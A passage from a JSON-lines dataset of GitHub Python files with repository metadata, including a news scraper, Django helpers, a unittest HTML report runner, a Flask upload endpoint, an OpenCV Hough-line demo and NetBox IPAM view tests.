None\n","repo_name":"typesafehub/conductr-cli","sub_path":"conductr_cli/bundle_shorthand.py","file_name":"bundle_shorthand.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"778262037","text":"from bs4 import BeautifulSoup\nimport requests\nfrom dateutil import parser\nimport os\nfrom urllib.parse import urlparse\n\n\ndef getArticle(url):\n r = requests.get(url)\n\n html_doc = r.text\n\n soup = BeautifulSoup(html_doc, 'html.parser')\n\n def getByline():\n try:\n byline = soup.find(\n 'span', itemprop='author').text.strip().split(',')[0]\n return byline\n except AttributeError:\n pass\n\n def getPublishDate():\n publishDate = parser.parse(\n soup.find('time', class_='tnt-date')['datetime']).strftime('%Y-%m-%d')\n return publishDate\n\n def getPhotoCaption():\n try:\n photoCaption = soup.find(\n 'span', class_='caption-text').text.strip()\n return photoCaption\n except:\n return None\n\n def getHeadline():\n headline = soup.find('h1').text.strip()\n return headline\n\n def getArticleText():\n p_list = []\n t = soup.find('div', itemprop='articleBody')\n for i in t.find_all('p'):\n p_list.append(i)\n return p_list\n\n def getTags():\n article_tags_list = []\n article_tags = soup.select('.asset-tags a')\n for i in range(0, len(article_tags)):\n article_tags_list.append(article_tags[i].getText())\n return article_tags_list\n\n def getPhotographerByline():\n try:\n fizz = soup.find(\n 'span', class_='tnt-byline').text.strip().split('/')[0]\n return fizz\n except AttributeError:\n pass\n\n def getPhoto(directory):\n photoSrc = soup.find_all('meta', itemprop='url')[-1]['content']\n photoAlt = soup.select('.image img')[0].get('alt')\n r = requests.get(photoSrc)\n imageFile = open(os.path.join(directory, os.path.basename(\n photoAlt.replace(' ', '-').lower() + '.jpg')), 'wb')\n for chunk in r.iter_content(100000):\n imageFile.write(chunk)\n image_name = photoAlt.replace(' ', '-').lower() + '.jpg'\n return photoSrc, image_name\n\n def createDir(headline):\n dirName = headline.replace(' ', '-').lower()\n fullDir = 'articles/' + dirName\n foo = dirName + '/image'\n os.makedirs('articles/' + foo, exist_ok=True)\n fizz = 'articles/' + foo\n return fizz, fullDir\n\n def getCategory():\n parsed_url = urlparse(url).path.split('/')\n category = str(parsed_url[1])\n return category\n\n headline = getHeadline()\n createDir(headline)\n imageDirectory = createDir(headline)[0]\n image_name = getPhoto(imageDirectory)[1]\n articleDirectory = createDir(headline)[1]\n articleBody = getArticleText()\n tagsList = getTags()\n photographerByline = getPhotographerByline()\n category = getCategory()\n photoCaption = getPhotoCaption()\n publishDate = getPublishDate()\n byline = getByline()\n\n return headline, byline, publishDate, category, articleBody, photographerByline, photoCaption, tagsList, articleDirectory, image_name\n","repo_name":"ryan-serpico/alligator-scraper","sub_path":"get_article.py","file_name":"get_article.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40085015292","text":"import json\nfrom collections import defaultdict\nfrom asgiref.sync import sync_to_async\nfrom db import Dataset, Model, Fit\n\n\n@sync_to_async\ndef create_dataset(name, parent, content):\n info = f'{len(content[\"x\"])} datapoints'\n Dataset(name=name, parent=parent, info=info, content=json.dumps(content)).save()\n\n\n@sync_to_async\ndef get_data_names():\n names_info = defaultdict(list)\n for d in Dataset.objects.all():\n names_info[d.parent].append({'name': d.name, 'id': d.id, 'info': d.info})\n return dict(names_info)\n\n\n@sync_to_async\ndef get_data_content(ID):\n try:\n d = Dataset.objects.get(id=ID)\n except Dataset.DoesNotExist:\n return None\n return json.loads(d.content)\n\n\n@sync_to_async\ndef delete_data(parent):\n Dataset.objects.filter(parent=parent).delete()\n\n\n@sync_to_async\ndef create_model(name, content):\n m, _ = Model.objects.get_or_create(name=name)\n m.content = json.dumps(content)\n m.save()\n\n\n@sync_to_async\ndef delete_model(name):\n Model.objects.get(name=name).delete()\n\n\n@sync_to_async\ndef get_models_names():\n return [x.name for x in Model.objects.all()]\n\n\ndef args_to_kwargs(d):\n kwargs = {x['name']: x['value'] for x in d['args']}\n if not d['expr_mode']:\n y0 = kwargs['y0']\n del kwargs['y0']\n for i in range(len(y0)):\n kwargs[f'y0[{i}]'] = y0[i]\n return kwargs\n\n\ndef args_to_consts(d):\n consts = {x['name']: x['const'] for x in d['args']}\n if not d['expr_mode']:\n y0 = consts['y0']\n del consts['y0']\n for i in range(100):\n consts[f'y0[{i}]'] = y0\n return consts\n\n\n@sync_to_async\ndef get_models_content(name):\n try:\n d = Model.objects.get(name=name)\n except Model.DoesNotExist:\n return\n\n data = json.loads(d.content)\n data['kwargs'] = args_to_kwargs(data)\n return data\n\n\n@sync_to_async\ndef get_all_models():\n data = {x.name: json.loads(x.content) for x in Model.objects.all()}\n for m in data:\n data[m]['kwargs'] = args_to_kwargs(data[m])\n data[m]['consts'] = args_to_consts(data[m])\n return data\n\n\nif __name__ == '__main__':\n print(get_models_names())\n","repo_name":"juliusbierk/simultant","sub_path":"pysrc/dbfcts.py","file_name":"dbfcts.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74044681831","text":"import uuid\n\n\ndef handle_named_url(data_dict: dict):\n \"\"\"\n adding uuid to the named url\n , the name field was a bit\n confusing to the client.\n \"\"\"\n title = data_dict.get(\"title\")\n name = _remove_special_characters_from_package_url(title)\n if name is not None:\n name = name.replace(\" \", \"-\")\n name += \"-\" + str(uuid.uuid4())\n name = name.lower()\n return name\n\n\ndef _remove_special_characters_from_package_url(url):\n \"\"\"\n special characters are not\n accepted by CKAN for dataset\n urls, replace them\n \"\"\"\n special_chars = \"!\\\"”'#$%&'()*+,-./:;<=>?@[\\]^`{|}~.[]\"\n if url is not None:\n for i in url:\n if i in special_chars:\n url = url.replace(i, \"-\")\n\n return url\n","repo_name":"kartoza/ckanext-dalrrd-emc-dcpr","sub_path":"ckanext/dalrrd_emc_dcpr/logic/action/add_named_url.py","file_name":"add_named_url.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"15136435449","text":"n=int(input())\r\nl=[0]+list(map(int,input().split()))\r\nfor i in range(1,n+1):\r\n l[i]+=l[i-1]\r\nd={}\r\nfor i in l:\r\n if i not in d:\r\n d[i]=1\r\n else:\r\n d[i]+=1\r\nans=0\r\nfor a in d.values():\r\n ans+=a*(a-1)//2\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc023/A/4892421.py","file_name":"4892421.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"43564936671","text":"import os\nimport sys\n\nfrom dataclasses import dataclass\nfrom sklearn.model_selection import train_test_split\n\nfrom src.logger import logging\nfrom src.exception import CustomException\nfrom src.utils import data_loader, save_dataframe\nfrom src.components.data_transformer import DataTransformer\nfrom src.components.model_trainer import ModelTrainner\n\n\n\n@dataclass\nclass DataIngestionConfig:\n raw_data_path: str = os.path.join('../../data', 'raw', 'StudentsPerformance.csv')\n train_data_path: str = os.path.join('../../artifacts', 'data', 'train.csv')\n test_data_path: str = os.path.join('../../artifacts', 'data', 'test.csv')\n\n\nclass DataIngestion:\n def __init__(self):\n self.data_ingestion_config = DataIngestionConfig()\n\n def initiate_data_ingestion(self):\n logging.info('Entered the data ingestion method or component.')\n try:\n df = data_loader(file_path=self.data_ingestion_config.raw_data_path)\n logging.info('Read the dataset as dataframe.')\n os.makedirs(os.path.dirname(self.data_ingestion_config.train_data_path),\n exist_ok=True)\n\n logging.info('Train Test split initiated.')\n train_df, test_df = train_test_split(df,\n test_size=0.3,\n random_state=101)\n\n save_dataframe(dataframe=train_df,\n path=self.data_ingestion_config.train_data_path)\n save_dataframe(dataframe=test_df,\n path=self.data_ingestion_config.test_data_path)\n\n logging.info('Data ingestion is completed.')\n\n return self.data_ingestion_config.train_data_path, \\\n self.data_ingestion_config.test_data_path\n\n except Exception as ex:\n raise CustomException(ex, sys)\n\n\nif __name__ == '__main__':\n obj = DataIngestion()\n train_df, test_df = obj.initiate_data_ingestion()\n\n data_transformer = DataTransformer()\n train_arr, test_arr, _ = data_transformer.initiate_data_transformation(train_df, test_df)\n\n model_trainer_obj = ModelTrainner()\n print(model_trainer_obj.initiate_model_trainer(train_arr, test_arr))\n","repo_name":"mmucds/score_prediction","sub_path":"src/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40602469079","text":"\"\"\"\n\n本模块主要是为了解决多线程运行unittest测试用例的问题\n该模块预留了两个入口,\n\n注意点:\n使用起来非常简单,只需要调用TestRunner的run方法即可执行测试用例,运行的时候可通过参数指定开启的线程数量\n\n\"\"\"\nimport os\nimport re\nimport traceback\nimport unittest\nimport sys\nimport time\nfrom concurrent.futures.thread import ThreadPoolExecutor\nfrom io import StringIO\n\nfrom jinja2 import Environment, FileSystemLoader\n\norigin_stdout = sys.stdout\n\n\ndef output2console(s):\n \"\"\"将stdout内容输出到console\"\"\"\n tmp_stdout = sys.stdout\n sys.stdout = origin_stdout\n print(s, end='')\n sys.stdout = tmp_stdout\n\n\nclass OutputRedirector(object):\n \"\"\" Wrapper to redirect stdout or stderr \"\"\"\n\n def __init__(self, fp):\n self.fp = fp\n\n def write(self, s):\n self.fp.write(s)\n output2console(s)\n\n def writelines(self, lines):\n self.fp.writelines(lines)\n\n def flush(self):\n self.fp.flush()\n\n\nstdout_redirector = OutputRedirector(sys.stdout)\nstderr_redirector = OutputRedirector(sys.stderr)\n\n\nclass _TestResult(unittest.TestResult):\n \"\"\" 测试报告\"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.fields = {\n \"success\": 0,\n \"all\": 0,\n \"fail\": 0,\n \"skip\": 0,\n \"error\": 0,\n \"begin_time\": \"\",\n \"results\": [],\n \"testClass\": set()\n }\n self.sys_stdout = None\n self.sys_stderr = None\n self.outputBuffer = None\n\n def startTest(self, test):\n \"\"\"\n 当测试用例测试即将运行时调用\n :return:\n \"\"\"\n super().startTest(test)\n self.start_time = time.time()\n self.outputBuffer = StringIO()\n stdout_redirector.fp = self.outputBuffer\n stderr_redirector.fp = self.outputBuffer\n self.sys_stdout = sys.stdout\n self.sys_stderr = sys.stderr\n sys.stdout = stdout_redirector\n sys.stderr = stderr_redirector\n\n def complete_output(self):\n if self.sys_stdout:\n sys.stdout = self.sys_stdout\n sys.stderr = self.sys_stderr\n self.sys_stdout = None\n self.sys_stderr = None\n return self.outputBuffer.getvalue()\n\n def stopTest(self, test):\n \"\"\"\n 当测试用列执行完成后进行调用\n :return:\n \"\"\"\n # 获取用例的执行时间\n test.run_time = '{:.3}s'.format((time.time() - self.start_time))\n # 获取该用例的类描述\n test.class_name = test.__class__.__doc__\n # 获取用例的方法名\n test.method_name = test.__dict__['_testMethodName']\n\n # 获取用例的描述\n test.method_doc = test.shortDescription()\n # 保存该用例执行的结果\n self.fields['results'].append(test)\n self.fields[\"testClass\"].add(test.class_name)\n\n self.complete_output()\n\n def stopTestRun(self, title=None):\n \"\"\"\n 测试用例执行完手动调用统计测试结果的相关数据\n :param title:\n :return:\n \"\"\"\n # 获取失败的用例数量\n self.fields['fail'] = len(self.failures)\n # 获取错误的用例数量\n self.fields['error'] = len(self.errors)\n # 获取标记跳过用例\n self.fields['skip'] = len(self.skipped)\n # 获取用例总数\n self.fields['all'] = sum(\n [self.fields['fail'], self.fields['error'], self.fields['skip'], self.fields['success']])\n self.fields['testClass'] = list(self.fields['testClass'])\n\n def addSuccess(self, test):\n \"\"\"用例执行通过,成功数量+1\"\"\"\n self.fields[\"success\"] += 1\n test.state = '成功'\n sys.stdout.write(\"{}执行结果——>【通过】\\n\".format(test))\n logs = []\n output = self.complete_output()\n logs.append(output)\n test.run_info = logs\n\n def addFailure(self, test, err):\n \"\"\"\n :param test: 测试用例\n :param err: 错误信息\n :return:\n \"\"\"\n super().addFailure(test, err)\n logs = []\n test.state = '失败'\n sys.stderr.write(\"{}执行结果——>【失败】\\n\".format(test))\n # 保存错误信息\n output = self.complete_output()\n logs.append(output)\n logs.extend(traceback.format_exception(*err))\n test.run_info = logs\n\n def addSkip(self, test, reason):\n \"\"\"\n 修改跳过用例的状态\n :param test:测试用例\n :param reason: 相关信息\n :return: None\n \"\"\"\n super().addSkip(test, reason)\n test.state = '跳过'\n sys.stdout.write(\"{}执行结果--【跳过Skip】\\n\".format(test))\n logs = [reason]\n test.run_info = logs\n\n def addError(self, test, err):\n \"\"\"\n 修改错误用例的状态\n :param test: 测试用例\n :param err:错误信息\n :return:\n \"\"\"\n\n super().addError(test, err)\n test.state = '错误'\n sys.stderr.write(\"{}执行结果——>【错误Error】\\n\".format(test))\n logs = []\n logs.extend(traceback.format_exception(*err))\n test.run_info = logs\n if test.__class__.__qualname__ == '_ErrorHolder':\n test.run_time = 0\n res = re.search(r'(.*)\\(.*\\.(.*)\\)', test.description)\n # 获取该错误的类名\n test.class_name = res.group(2)\n # 获取错误方法名\n test.method_name = res.group(1)\n # 获取用例的描述\n test.method_doc = test.shortDescription()\n # 保存该用例执行的结果\n self.fields['results'].append(test)\n self.fields[\"testClass\"].add(test.class_name)\n else:\n output = self.complete_output()\n logs.append(output)\n\n\nclass _ReRunResult(_TestResult):\n \"\"\"重运行的用例结果\"\"\"\n\n def __init__(self, count, interval):\n super().__init__()\n self.count = count\n self.interval = interval\n self.run_cases = []\n\n def startTest(self, test):\n if not hasattr(test, \"count\"):\n super().startTest(test)\n\n def stopTest(self, test):\n if test not in self.run_cases:\n self.run_cases.append(test)\n super().stopTest(test)\n print(\"======================stop=================================\")\n\n def addFailure(self, test, err):\n \"\"\"\n :param test: 测试用例\n :param err: 错误信息\n :return:\n \"\"\"\n if not hasattr(test, 'count'):\n test.count = 0\n if test.count < self.count:\n test.count += 1\n sys.stderr.write(\"{}执行结果——>【失败Failure】\\n\".format(test))\n for string in traceback.format_exception(*err):\n sys.stderr.write(string)\n sys.stderr.write(\"================{}重运行第{}次================\\n\".format(test, test.count))\n\n time.sleep(self.interval)\n test.run(self)\n else:\n if test.count != 0:\n sys.stderr.write(\"================重运行{}次完毕================\\n\".format(test.count))\n super().addFailure(test, err)\n\n def addError(self, test, err):\n \"\"\"\n 修改错误用例的状态\n :param test: 测试用例\n :param err:错误信息\n :return:\n \"\"\"\n if not hasattr(test, 'count'):\n test.count = 0\n if test.count < self.count:\n test.count += 1\n sys.stderr.write(\"{}执行结果——>【错误Error】\\n\".format(test))\n for string in traceback.format_exception(*err):\n sys.stderr.write(string)\n sys.stderr.write(\"================{}重运行第{}次================\\n\".format(test, test.count))\n time.sleep(self.interval)\n test.run(self)\n else:\n if test.count != 0:\n sys.stderr.write(\"================重运行{}次完毕================\\n\".format(test.count))\n super().addError(test, err)\n\n\nclass TestRunner:\n \"\"\"unittest运行程序\"\"\"\n\n def __init__(self, suite: unittest.TestSuite,\n filename=\"report.html\",\n report_dir=\".\",\n title='测试报告',\n tester=' ',\n desc=\" \",\n templates=1\n ):\n \"\"\"\n 初始化用例运行程序\n :param filename: 报告文件名\n :param report_dir:报告文件的路径\n :param title:测试套件标题\n :param templates: 可以通过参数值1或者2,指定报告的样式模板,目前只有两个模板\n :param tester:\n \"\"\"\n if not isinstance(suite, unittest.TestSuite):\n raise TypeError(\"suites 不是测试套件\")\n if not isinstance(filename, str):\n raise TypeError(\"filename is not str\")\n if not filename.endswith(\".html\"):\n filename = filename + \".html\"\n self.suite = suite\n self.filename = filename\n self.title = title\n self.tester = tester\n self.desc = desc\n self.templates = templates\n self.report_dir = report_dir\n self.result = []\n self.starttime = time.time()\n\n def classification_suite(self):\n \"\"\"\n 将测试套件中的用例,根据用例类位单位,拆分成多个测试套件,打包成列表类型\n :return: list-->[suite,suite,suite.....]\n \"\"\"\n suites_list = []\n\n def wrapper(suite):\n for item in suite:\n if isinstance(item, unittest.TestCase):\n suites_list.append(suite)\n break\n else:\n wrapper(item)\n\n wrapper(self.suite)\n return suites_list\n\n def classification_test_case(self):\n \"\"\"\n 将测试套件中的用例进行拆分,保存到列表中\n :return: list-->[case,case]\n \"\"\"\n test_list = []\n\n def wrapper(suite):\n for item in suite:\n if isinstance(item, unittest.TestCase):\n test_list.append(item)\n else:\n wrapper(item)\n\n wrapper(self.suite)\n return test_list\n\n def run(self, thread_count=1, exec_unit=\"class\"):\n \"\"\"\n 支持多线程执行\n 注意点:如果多个测试类共用某一个全局变量,由于资源竞争可能回出现错误\n :param thread_count:线程数量,默认位1\n :param exec_unit: case ro class\n case: 以测试用例为单位开启多线程运行,不能保证用例执行的顺序问题\n class:以用例类为单位开启多线程运行,可以保证用例类中的用例执行的顺序问题\n :return:\n \"\"\"\n if exec_unit == \"case\":\n # 将测试套件按照用例进行拆分\n suites = self.classification_test_case()\n else:\n # 将测试套件按照用例类进行拆分\n suites = self.classification_suite()\n\n with ThreadPoolExecutor(max_workers=thread_count) as ts:\n for i in suites:\n res = _TestResult()\n self.result.append(res)\n ts.submit(i.run, result=res).add_done_callback(res.stopTestRun)\n ts.shutdown(wait=True)\n self.get_reports()\n\n def rerun_run(self, count=0, interval=2):\n \"\"\"\n 测试用例失败、错误重跑机制\n :param count: 重跑次数,默认为0\n :param interval: 重跑时间间隔,默认为2\n :return:\n \"\"\"\n res = _ReRunResult(count=count, interval=interval)\n self.result.append(res)\n suites = self.classification_test_case()\n for case in suites:\n case.run(res)\n res.stopTestRun()\n self.get_reports()\n\n def get_reports(self):\n \"\"\"生成报告\"\"\"\n print(\"所有用例执行完毕,正在生成测试报告中......\")\n # 汇总测试结果\n test_result = {\n \"success\": 0,\n \"all\": 0,\n \"fail\": 0,\n \"skip\": 0,\n \"error\": 0,\n \"results\": [],\n \"testClass\": [],\n }\n # 整合测试结果\n for res in self.result:\n for item in test_result:\n test_result[item] += res.fields[item]\n\n test_result['runtime'] = '{:.2f} S'.format(time.time() - self.starttime)\n test_result[\"begin_time\"] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(self.starttime))\n test_result[\"title\"] = self.title\n test_result[\"tester\"] = self.tester\n test_result['desc'] = self.desc\n if test_result['all'] != 0:\n test_result['pass_rate'] = '{:.2f}'.format(test_result['success'] / test_result['all'] * 100)\n else:\n test_result['pass_rate'] = 0\n\n # 获取报告模板\n template_path = os.path.join(os.path.dirname(__file__), 'templates')\n env = Environment(loader=FileSystemLoader(template_path))\n if self.templates == 2:\n template = env.get_template('templates02.html')\n else:\n template = env.get_template('templates.html')\n file_path = os.path.join(self.report_dir, self.filename)\n # 渲染报告模板\n res = template.render(test_result)\n # 输出报告到文件\n with open(file_path, 'wb') as f:\n f.write(res.encode('utf8'))\n\n print(\"测试报告已经生成,报告路径:{}\".format(file_path))\n\n\nif __name__ == '__main__':\n suite1 = unittest.defaultTestLoader.discover(r\"C:\\project\\musen\\case_test\")\n tr = TestRunner(suite1, title='测试报告', filename=\"musen\")\n tr.run()\n","repo_name":"tianya66/web_test","sub_path":"common/beautiful_report/HTMLReport.py","file_name":"HTMLReport.py","file_ext":"py","file_size_in_byte":13938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74714365671","text":"letters = input(\"Please enter three letters separated by a space \\n\")\nletters = letters.split()\nwords = open(\"words.txt\", 'r')\nfout = open(\"letters.txt\", 'w')\n\nfor line in words:\n accept = 0\n word = line.strip()\n print(word)\n for letter in letters:\n if line.find(letter) != -1:\n accept += 1\n if accept == 3:\n fout.write(word + \"\\n\")\n accept = 0\nwords.close()\nfout.close()\n","repo_name":"MTLK-DCH/COM661","sub_path":"wk1_PythonAndWebProcessing_A1A2/A1.1_PythonTextProcessing/check_for_letters.py","file_name":"check_for_letters.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22623439820","text":"from importlib import import_module\nfrom flask import Flask, render_template, Response, request, jsonify\nfrom flask_cors import CORS\nfrom werkzeug.utils import secure_filename\nimport pyaml\n\napp = Flask(__name__)\n\n#curl -i -X PUT -F name=Test -F data=@specs.epgz http://localhost:8080/upload_file\n@app.route('/upload_file', methods=['PUT','POST'])\ndef receive_file():\n file = request.files['data']\n print (file)\n if file:\n filename = secure_filename(file.filename)\n file.save(filename) \n #return (redirect(url_for('receive_file')))\n return jsonify({\"mesasge\":\"move message received\"})\n\n@app.route('/', methods=['GET'])\ndef entry():\n return \"Hello World\"\n\ndef main():\n app.run(host='0.0.0.0', port=8080, threaded=True)\n\nif __name__ == '__main__':\n main()","repo_name":"mayoor/scratch_pad","sub_path":"main_service.py","file_name":"main_service.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"50517505","text":"import re\n\ntext = 'carol eats cats.'\nreg = re.compile(r'''\n (alice|bob|carol)\n \\s\n (eats|pets|throws)\n \\s\n (apples|cats|baseballs)\n .$\n\n''', re.I | re.VERBOSE)\n\nmo = reg.search(text)\nif mo == None:\n print('None')\nelse:\n print(mo.group(0))\n","repo_name":"Shinpei2/python_source","sub_path":"automation/chapter7/regax5.py","file_name":"regax5.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13558352418","text":"#!/usr/bin/env python3\n\nimport os\nimport pathlib\nimport sys\nfrom typing import List\n\nfrom setuptools import setup\n\nSETUP_DIR = os.path.dirname(__file__)\nREADME = os.path.join(SETUP_DIR, \"README.rst\")\n\nexec(open(\"cwl_utils/__meta__.py\").read())\n\nneeds_pytest = {\"pytest\", \"test\", \"ptr\"}.intersection(sys.argv)\npytest_runner: List[str] = [\"pytest < 8\", \"pytest-runner\"] if needs_pytest else []\nsetup(\n name=\"cwl-utils\",\n version=__version__, # type: ignore # noqa: F821\n long_description=open(README).read(),\n long_description_content_type=\"text/x-rst\",\n author=\"Common workflow language working group\",\n author_email=\"common-workflow-language@googlegroups.com\",\n url=\"https://github.com/common-workflow-language/cwl-utils\",\n license=\"Apache 2.0\",\n python_requires=\">=3.8\",\n setup_requires=pytest_runner,\n packages=[\"cwl_utils\", \"cwl_utils.parser\", \"cwl_utils.tests\", \"cwl_utils.testdata\"],\n package_dir={\n \"cwl_utils.parser\": \"cwl_utils/parser\",\n \"cwl_utils.tests\": \"tests\",\n \"cwl_utils.testdata\": \"testdata\",\n },\n include_package_data=True,\n install_requires=open(\n os.path.join(pathlib.Path(__file__).parent, \"requirements.txt\")\n )\n .read()\n .splitlines(),\n tests_require=[\"pytest<8\", \"pytest-mock\"],\n test_suite=\"tests\",\n extras_require={\"pretty\": [\"cwlformat\"]},\n entry_points={\n \"console_scripts\": [\n \"cwl-cite-extract=cwl_utils.cite_extract:main\",\n \"cwl-docker-extract=cwl_utils.docker_extract:main\",\n \"cwl-expression-refactor=cwl_utils.expression_refactor:main\",\n \"cwl-graph-split=cwl_utils.graph_split:main\",\n \"cwl-normalizer=cwl_utils.normalizer:main\",\n ]\n },\n classifiers=[\n \"Environment :: Console\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: POSIX\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Programming Language :: Python :: 3.12\",\n \"Typing :: Typed\",\n ],\n)\n","repo_name":"common-workflow-language/cwl-utils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"72"} +{"seq_id":"42765667542","text":"# -*- coding:utf-8 -*-\nimport cv2 as cv\nimport numpy as np\nimport sys\n\n\ndef draw_line(img, lines):\n img_copy = img.copy()\n for i in range(0, len(lines)):\n rho, theta = lines[i][0][0], lines[i][0][1]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * a)\n cv.line(img_copy, (x1, y1), (x2, y2), (255, 255, 255), 2)\n return img_copy\n\n\nif __name__ == '__main__':\n # 读取图像HoughLines.jpg\n image = cv.imread('./images/HoughLines.jpg')\n if image is None:\n print('Failed to read HoughLines.jpg.')\n sys.exit()\n cv.imshow('Origin', image)\n\n # 检测图像边缘\n image_edge = cv.Canny(image, 50, 150, 3)\n cv.imshow('Image Edge', image_edge)\n\n # 分别设定不同累加器阈值进行直线检测,并显示结果\n threshold_1 = 200\n lines_1 = cv.HoughLines(image_edge, 1, np.pi / 180, threshold_1)\n try:\n img1 = draw_line(image, lines_1)\n cv.imshow('Image HoughLines({})'.format(threshold_1), img1)\n except TypeError:\n print('累加器阈值设为 {} 时,不能检测出直线.'.format(threshold_1))\n\n threshold_2 = 300\n lines_2 = cv.HoughLines(image_edge, 1, np.pi / 180, threshold_2)\n try:\n img2 = draw_line(image, lines_2)\n cv.imshow('Image HoughLines({})'.format(threshold_2), img2)\n except TypeError:\n print('累加器阈值设为 {} 时,不能检测出直线.'.format(threshold_2))\n\n cv.waitKey(0)\n cv.destroyAllWindows()\n","repo_name":"fengzhenHIT/learnOpenCV4_Python","sub_path":"chapter7/HoughLines.py","file_name":"HoughLines.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"72"} +{"seq_id":"17067696824","text":"from netaddr import IPNetwork\nimport urllib.parse\n\nfrom django.test import Client, TestCase\nfrom django.urls import reverse\n\nfrom dcim.models import Device, DeviceRole, DeviceType, Manufacturer, Site\nfrom ipam.constants import IP_PROTOCOL_TCP\nfrom ipam.models import Aggregate, IPAddress, Prefix, RIR, Role, Service, VLAN, VLANGroup, VRF\nfrom utilities.testing import create_test_user\n\n\nclass VRFTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_vrf'])\n self.client = Client()\n self.client.force_login(user)\n\n VRF.objects.bulk_create([\n VRF(name='VRF 1', rd='65000:1'),\n VRF(name='VRF 2', rd='65000:2'),\n VRF(name='VRF 3', rd='65000:3'),\n ])\n\n def test_vrf_list(self):\n\n url = reverse('ipam:vrf_list')\n params = {\n \"q\": \"65000\",\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_configcontext(self):\n\n vrf = VRF.objects.first()\n response = self.client.get(vrf.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n\n\nclass RIRTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_rir'])\n self.client = Client()\n self.client.force_login(user)\n\n RIR.objects.bulk_create([\n RIR(name='RIR 1', slug='rir-1'),\n RIR(name='RIR 2', slug='rir-2'),\n RIR(name='RIR 3', slug='rir-3'),\n ])\n\n def test_rir_list(self):\n\n url = reverse('ipam:rir_list')\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n\nclass AggregateTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_aggregate'])\n self.client = Client()\n self.client.force_login(user)\n\n rir = RIR(name='RIR 1', slug='rir-1')\n rir.save()\n\n Aggregate.objects.bulk_create([\n Aggregate(family=4, prefix=IPNetwork('10.1.0.0/16'), rir=rir),\n Aggregate(family=4, prefix=IPNetwork('10.2.0.0/16'), rir=rir),\n Aggregate(family=4, prefix=IPNetwork('10.3.0.0/16'), rir=rir),\n ])\n\n def test_aggregate_list(self):\n\n url = reverse('ipam:aggregate_list')\n params = {\n \"rir\": RIR.objects.first().slug,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_aggregate(self):\n\n aggregate = Aggregate.objects.first()\n response = self.client.get(aggregate.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n\n\nclass RoleTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_role'])\n self.client = Client()\n self.client.force_login(user)\n\n Role.objects.bulk_create([\n Role(name='Role 1', slug='role-1'),\n Role(name='Role 2', slug='role-2'),\n Role(name='Role 3', slug='role-3'),\n ])\n\n def test_role_list(self):\n\n url = reverse('ipam:role_list')\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n\nclass PrefixTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_prefix'])\n self.client = Client()\n self.client.force_login(user)\n\n site = Site(name='Site 1', slug='site-1')\n site.save()\n\n Prefix.objects.bulk_create([\n Prefix(family=4, prefix=IPNetwork('10.1.0.0/16'), site=site),\n Prefix(family=4, prefix=IPNetwork('10.2.0.0/16'), site=site),\n Prefix(family=4, prefix=IPNetwork('10.3.0.0/16'), site=site),\n ])\n\n def test_prefix_list(self):\n\n url = reverse('ipam:prefix_list')\n params = {\n \"site\": Site.objects.first().slug,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_prefix(self):\n\n prefix = Prefix.objects.first()\n response = self.client.get(prefix.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n\n\nclass IPAddressTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_ipaddress'])\n self.client = Client()\n 